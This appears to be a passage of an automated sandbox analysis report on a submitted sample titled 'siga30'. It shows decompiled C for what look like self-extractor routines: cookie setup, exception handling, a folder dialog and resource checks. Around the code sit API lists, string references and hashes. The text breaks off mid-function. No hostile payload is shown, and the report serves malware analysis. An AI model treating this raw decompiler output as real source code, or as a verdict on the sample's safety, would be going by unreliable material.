Instruction Fuzzy Hash: 55219171B40245BAFF205BA59C4EFBB76B8FB87B15F100019FA02E6D81DB748801D666

Uniqueness

Uniqueness Score: -1.00%

Function 008A7155 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A7155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x8a8004; // 0x8481bc1d
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x8a8004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x8a8004 = _t39;
				}
				_t37 =  !_t36;
				 *0x8a8008 = _t37;
				return _t37;
			}

0x008a715d
0x008a7161
0x008a7165
0x008a7178
0x008a7182
0x008a718e
0x008a7197
0x008a71a0
0x008a71b1
0x008a71b8
0x008a71c4
0x008a71c7
0x008a71cb
0x008a71d5
0x008a71da
0x008a71da
0x008a71dc
0x008a71dc
0x008a71e2
0x008a71e5
0x008a71ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 008A7182
GetCurrentProcessId.KERNEL32 ref: 008A7191
GetCurrentThreadId.KERNEL32 ref: 008A719A
GetTickCount.KERNEL32 ref: 008A71A3
QueryPerformanceCounter.KERNEL32(?), ref: 008A71B8

Strings

C~{System\CurrentControlSet\Control\Session Manager, xrefs: 008A71E5

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID: C~{System\CurrentControlSet\Control\Session Manager
API String ID: 1445889803-1762516746
Opcode ID: d6115ae6360a9a0ce53ff1620116ffb7f0e9f44992de573fccb07d9bfabb5ff4
Instruction ID: bf7cbad7ad82abf848b0df5e6fdb202ac68519e321eba1b52876e45b04ce61dc
Opcode Fuzzy Hash: d6115ae6360a9a0ce53ff1620116ffb7f0e9f44992de573fccb07d9bfabb5ff4
Instruction Fuzzy Hash: E5113A71D01608EBEB14DFB8DA48A9EB7F4FF0A314F614866D802E7A10EB349A04DB51

Uniqueness

Uniqueness Score: -1.00%

Function 008A6CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A6CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x008a6cf7
0x008a6d00
0x008a6d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,008A6E26,008A1000), ref: 008A6CF7
UnhandledExceptionFilter.KERNEL32(008A6E26,?,008A6E26,008A1000), ref: 008A6D00
GetCurrentProcess.KERNEL32(C0000409,?,008A6E26,008A1000), ref: 008A6D0B
TerminateProcess.KERNEL32(00000000,?,008A6E26,008A1000), ref: 008A6D12

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 9ecc665c866d1e761fd3edac9caac3f863b2a6c36348801bf38703f1bbf68297
Instruction ID: 7373561093d02f7560ef34a304e27ea75ab408c3ceacaf7ed7efa8ef3dd3e0f1
Opcode Fuzzy Hash: 9ecc665c866d1e761fd3edac9caac3f863b2a6c36348801bf38703f1bbf68297
Instruction Fuzzy Hash: EED0C932000508BBFB452BE1EC0CA593F28FB4A212F444000F31B82C20CB324451CB52

Uniqueness

Uniqueness Score: -1.00%

Function 008A3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E008A3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E008A43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "siga30");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x8a9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x8a91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E008A44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x8a91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x8a91e5 - 3;
						if(_t49 - 0x8a91e5 < 3) {
							goto L32;
						}
						_t24 =  *0x8a91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x8a91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E008A658A(0x8a91e4, 0x104, 0x8a1140);
								_t27 = E008A58C8(0x8a91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x8a91e4 - 0x5c;
									if( *0x8a91e4 != 0x5c) {
										L30:
										_t30 = E008A597D(0x8a91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x8a91e5 - 0x5c;
									if( *0x8a91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E008A44B9(_t64, 0x54a, 0x8a91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x8a91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x8a91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x8a91e4 - 0x5c;
						if( *0x8a91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x8a9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x8a9a3c, 0x3e8, 0x8a8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E008A4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x8a87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E008A44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x008a321b
0x008a321e
0x008a3221
0x008a343c
0x008a343e
0x008a343f
0x008a3445
0x008a3447
0x00000000
0x008a3447
0x008a3229
0x008a322a
0x008a322f
0x008a33ec
0x008a33f7
0x008a3410
0x008a3416
0x008a341d
0x008a342d
0x008a342d
0x008a3438
0x00000000
0x008a3438
0x008a3237
0x008a3243
0x008a3243
0x008a3246
0x008a32ee
0x008a32f4
0x008a32f6
0x008a33d4
0x008a33d6
0x008a33db
0x008a33dc
0x008a33de
0x008a33df
0x008a3370
0x008a3372
0x00000000
0x008a3372
0x008a32fc
0x008a3301
0x008a3301
0x008a3303
0x008a3304
0x008a3304
0x008a330a
0x008a330d
0x00000000
0x00000000
0x008a3313
0x008a3318
0x008a331a
0x008a3331
0x008a3332
0x008a333a
0x008a333d
0x008a337c
0x008a3388
0x008a338f
0x008a3394
0x008a3396
0x008a33a4
0x008a33ab
0x008a33b6
0x008a33be
0x008a33c3
0x008a33c5
0x008a3435
0x008a3437
0x008a3437
0x00000000
0x008a3437
0x008a33c7
0x008a33c9
0x008a33cc
0x00000000
0x008a33cc
0x008a33ad
0x008a33b4
0x00000000
0x00000000
0x00000000
0x008a33b4
0x008a3398
0x008a3399
0x008a339b
0x008a339c
0x008a339d
0x00000000
0x008a339d
0x008a334c
0x008a3351
0x008a3354
0x00000000
0x00000000
0x008a335c
0x008a3362
0x008a3364
0x00000000
0x00000000
0x008a3366
0x008a3367
0x008a3369
0x008a336a
0x008a336b
0x00000000
0x008a336b
0x008a331c
0x008a3323
0x00000000
0x00000000
0x008a3329
0x008a332b
0x00000000
0x00000000
0x00000000
0x008a332b
0x008a324c
0x008a324c
0x008a324f
0x008a32c8
0x008a32ce
0x00000000
0x008a32ce
0x008a3251
0x008a3256
0x00000000
0x00000000
0x008a3271
0x008a3277
0x008a3279
0x008a3298
0x008a329d
0x008a329f
0x00000000
0x00000000
0x008a32b0
0x008a32b6
0x008a32b8
0x00000000
0x00000000
0x008a32be
0x008a3280
0x008a3289
0x008a328e
0x00000000
0x008a328e
0x008a327b
0x00000000
0x008a327b
0x00000000

APIs

LoadStringA.USER32(000003E8,008A8598,00000200), ref: 008A3271
GetDesktopWindow.USER32 ref: 008A33E2
SetWindowTextA.USER32(?,siga30), ref: 008A33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 008A3410
GetDlgItem.USER32(?,00000836), ref: 008A3426
EnableWindow.USER32(00000000), ref: 008A342D
EndDialog.USER32(?,00000000), ref: 008A343F

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A32E2, 008A32E7, 008A3331, 008A3344, 008A335B, 008A336A
siga30, xrefs: 008A33F1

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$siga30
API String ID: 2418873061-1197012092
Opcode ID: de7647330dc6d6273e86e86e6b7c83fbf36f690a22b573dc33d239b101a819a8
Instruction ID: 8a6e6f8f3fd528b5b482440ff867d7caa4ac99651732261cbe05c8e0e523a965
Opcode Fuzzy Hash: de7647330dc6d6273e86e86e6b7c83fbf36f690a22b573dc33d239b101a819a8
Instruction Fuzzy Hash: B15128303462407BFB255B396C8DF7B3959FB9BB55F104029F246D6EC0DBA88A01D2A5

Uniqueness

Uniqueness Score: -1.00%

Function 008A2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E008A2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x8a9a3c = __ecx;
				memset(0x8a9140, 0, 0x8fc);
				memset(0x8a8a20, 0, 0x32c);
				memset(0x8a88c0, 0, 0x104);
				 *0x8a93ec = 1;
				_t20 = E008A468F("TITLE", 0x8a9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x8a858c = _t27;
					SetEvent(_t27);
					_t64 = 0x8a9a34;
					if(E008A468F("EXTRACTOPT", 0x8a9a34, 4) != 0) {
						if(( *0x8a9a34 & 0x000000c0) == 0) {
							L12:
							 *0x8a9120 =  *0x8a9120 & _t65;
							if(E008A5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x8a8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x8a8184 != 0) {
										__imp__#17();
									}
									if( *0x8a8a24 == 0) {
										_t57 = _t65;
										if(E008A36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x8a9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x8a9a34 & 0x00000100) == 0 || ( *0x8a8a38 & 0x00000001) != 0 || E008A18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E008A6517(_t57, 0x7d6, _t34, E008A19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E008A2390(0x8a8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E008A44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E008A468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x8a8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x8a9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E008A44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E008A44B9(0, 0x54b, "siga30", 0, 0x10, 0);
										L11:
										CloseHandle( *0x8a8588);
										 *0x8a9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E008A44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x8a9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E008A6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x008a2cb5
0x008a2cbc
0x008a2cc7
0x008a2cc9
0x008a2cd1
0x008a2cd3
0x008a2cd9
0x008a2ce9
0x008a2cf9
0x008a2d0e
0x008a2d15
0x008a2d1c
0x008a2ef3
0x00000000
0x008a2d2d
0x008a2d34
0x008a2d3b
0x008a2d40
0x008a2d48
0x008a2d59
0x008a2d84
0x008a2e1f
0x008a2e1f
0x008a2e2e
0x008a2e41
0x008a2e5a
0x008a2e62
0x008a2e6c
0x008a2e6c
0x008a2e75
0x008a2e77
0x008a2e77
0x008a2e84
0x008a2e8b
0x008a2e94
0x00000000
0x008a2e96
0x008a2e96
0x008a2e9e
0x008a2ea2
0x008a2eba
0x00000000
0x008a2ece
0x008a2ede
0x008a2eed
0x00000000
0x00000000
0x00000000
0x00000000
0x008a2eed
0x008a2eef
0x008a2eef
0x008a2eef
0x008a2eef
0x008a2ea2
0x008a2e86
0x008a2e88
0x008a2e88
0x008a2e43
0x008a2e48
0x00000000
0x008a2e48
0x008a2e30
0x008a2e30
0x008a2ef8
0x008a2f01
0x00000000
0x008a2f01
0x008a2d8a
0x008a2d8f
0x008a2da1
0x00000000
0x008a2da3
0x008a2dae
0x008a2db4
0x008a2dbb
0x00000000
0x008a2dca
0x008a2dd3
0x008a2df5
0x008a2e02
0x00000000
0x00000000
0x00000000
0x00000000
0x008a2dd5
0x008a2dde
0x008a2de3
0x008a2e04
0x008a2e0a
0x008a2e10
0x00000000
0x008a2e10
0x008a2dd3
0x008a2dbb
0x008a2da1
0x008a2d5b
0x008a2d5b
0x008a2d5d
0x008a2d69
0x008a2d6e
0x008a2f06
0x008a2f06
0x008a2f06
0x008a2d59
0x008a2f18

APIs

memset.MSVCRT ref: 008A2CD9
memset.MSVCRT ref: 008A2CE9
memset.MSVCRT ref: 008A2CF9

Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46A0
Part of subcall function 008A468F: SizeofResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46A9
Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46C3
Part of subcall function 008A468F: LoadResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46CC
Part of subcall function 008A468F: LockResource.KERNEL32(00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46D3
Part of subcall function 008A468F: memcpy_s.MSVCRT ref: 008A46E5
Part of subcall function 008A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 008A2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 008A2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 008A2DBD
CloseHandle.KERNEL32(siga30,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 008A2E0A

Part of subcall function 008A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008A4518
Part of subcall function 008A44B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 008A4554

Strings

siga30, xrefs: 008A2D04, 008A2DD9, 008A2DF0
VERCHECK, xrefs: 008A2E54
TITLE, xrefs: 008A2D09
INSTANCECHECK, xrefs: 008A2D95
EXTRACTOPT, xrefs: 008A2D4D

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$siga30
API String ID: 1002816675-2759441779
Opcode ID: 65d9955f704f988cab387628cfa556449f00a92df5b9ac9de82faccdab4ccb25
Instruction ID: 35ba2a7d92d4bc686f21920493c88e1bc0a64fb772cbd53fea489f536b3c2fe9
Opcode Fuzzy Hash: 65d9955f704f988cab387628cfa556449f00a92df5b9ac9de82faccdab4ccb25
Instruction Fuzzy Hash: 7A51E670744305AAFB34A76C8C4AB7B3699F787710F044035F982D5DD2EBB88891D626

Uniqueness

Uniqueness Score: -1.00%

Function 008A34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E008A34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x8a91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x8a8584 = _t35;
					E008A43D0(_t35, GetDesktopWindow());
					__eflags =  *0x8a8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "siga30");
					_t17 = CreateThread(0, 0, E008A4FE0, 0, 0, 0x8a8798);
					 *0x8a879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E008A44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x8a858c);
					_t38 =  *0x8a8584; // 0x0
					_t25 = E008A44B9(_t38, 0x4b2, 0x8a1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x8a91d8 = 1;
						SetEvent( *0x8a858c);
						_t39 =  *0x8a879c; // 0x0
						E008A3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x8a858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x8a879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x008a34fb
0x008a34fe
0x008a3665
0x008a3666
0x008a3666
0x008a3668
0x008a366e
0x008a366e
0x008a3671
0x008a3671
0x008a3677
0x00000000
0x008a3677
0x008a3504
0x008a3506
0x008a3507
0x008a350c
0x008a365b
0x008a365f
0x00000000
0x00000000
0x00000000
0x008a3661
0x008a3512
0x008a3515
0x008a35be
0x008a35c1
0x008a35d1
0x008a35d8
0x008a35de
0x008a35f8
0x008a3617
0x008a3617
0x008a3623
0x008a3637
0x008a363d
0x008a3642
0x008a3644
0x00000000
0x008a3646
0x008a3652
0x008a3657
0x008a3658
0x00000000
0x008a3658
0x008a3644
0x008a351b
0x008a351d
0x008a354f
0x008a3553
0x00000000
0x00000000
0x008a355f
0x008a3565
0x008a357c
0x008a3581
0x008a3584
0x008a359b
0x008a35a1
0x008a35a7
0x008a35ad
0x008a35b3
0x008a35b8
0x00000000
0x008a35b8
0x008a3586
0x008a3588
0x00000000
0x00000000
0x008a3590
0x00000000
0x008a3590
0x008a3524
0x008a3535
0x008a3541
0x00000000
0x008a3549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 008A3535
EndDialog.USER32(?,?), ref: 008A3541
ResetEvent.KERNEL32 ref: 008A355F
SetEvent.KERNEL32(008A1140,00000000,00000020,00000004), ref: 008A3590
GetDesktopWindow.USER32 ref: 008A35C7
GetDlgItem.USER32(?,0000083B), ref: 008A35F1
SendMessageA.USER32(00000000), ref: 008A35F8
GetDlgItem.USER32(?,0000083B), ref: 008A3610
SendMessageA.USER32(00000000), ref: 008A3617
SetWindowTextA.USER32(?,siga30), ref: 008A3623
CreateThread.KERNEL32 ref: 008A3637
EndDialog.USER32(?,00000000), ref: 008A3671

Strings

siga30, xrefs: 008A361D

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: siga30
API String ID: 2406144884-2499866817
Opcode ID: 57d8ef5a597b1a3beb710a021c958c4ef568ed1e8a9650e4f29ca90c3ce10b40
Instruction ID: dfe8cbdad60e8a59b38ddb502c15320d5d7527b5441336f63a5b457f008ac0ba
Opcode Fuzzy Hash: 57d8ef5a597b1a3beb710a021c958c4ef568ed1e8a9650e4f29ca90c3ce10b40
Instruction Fuzzy Hash: E031CF71240300BBFB641F29EC4DF6A3A68F79BB01F104529F612D5EA0CB798A00EB65

Uniqueness

Uniqueness Score: -1.00%

Function 008A4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E008A4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E008A44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x8a88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x8a87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x8a8598;
					_v36 = 1;
					_v32 = E008A4200;
					_v28 = 0x8a88c0;
					 *0x8aa288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x8aa288(_t32, 0x8a88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x8a88c0 != 0) {
							E008A1680(0x8a87a0, 0x104, 0x8a88c0);
						}
						 *0x8aa288(_v12);
						 *_v20();
